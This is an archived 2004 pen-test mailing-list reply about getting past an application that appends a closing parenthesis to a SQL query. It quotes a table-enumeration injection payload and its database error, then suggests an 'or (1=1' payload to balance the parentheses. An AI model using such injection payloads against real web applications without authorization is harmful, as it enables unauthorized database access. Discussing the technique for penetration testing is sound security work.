Re: SQL-Injection escape ')'
From: Fabrice MARIE (fabrice.marie_at_fma-rms.com)
Date: 07/05/04
- Previous message: Strcpy: "Fwd: RE: SQL-Injection escape ')'"
- In reply to: Strcpy: "SQL-Injection escape ')'"
- Next in thread: nummish: "Re: SQL-Injection escape ')'"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: pen-test@securityfocus.com Date: Mon, 5 Jul 2004 13:11:09 +0800
Hello,
On 03 July 2004 pm 22:45, Strcpy wrote:
> Hi list .
> I`m working on a web-application for vulnerability
> assesments in order to complete a pen-test job.
> there is a vulnerable query there but I can`t escape
> it ad use it to go farther .
> the page script add a ')' to end of query string
> always.
> I tried to pass it by useing # or -- or ')'=')' at the
> end of my query strings , but non worked :/
> here is an example :
> i sent this :
> A') select name from sysobjects where xtype='U'--
> [Microsoft][ODBC Microsoft Access Driver] Syntax
> error. in query expression 'city_name='Tehran' and
> (agency_english ='A') select name from sysobjects
> where xtype='U'--')'
> would you mind please help me ?
try something like this:
select name from sysobjects where xtype='U' or (1=1
This way if the application adds a parenthesis, it's just going
to close the one you opened on purpose and the syntax should
remain correct in the end.
'or 1=1' doesn't affect your SELECT query, because it's always true..
Have a nice day,
Fabrice.
-- Fabrice A. MARIE FMA Risk Management Solutions http://www.fma-rms.com/
- Previous message: Strcpy: "Fwd: RE: SQL-Injection escape ')'"
- In reply to: Strcpy: "SQL-Injection escape ')'"
- Next in thread: nummish: "Re: SQL-Injection escape ')'"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
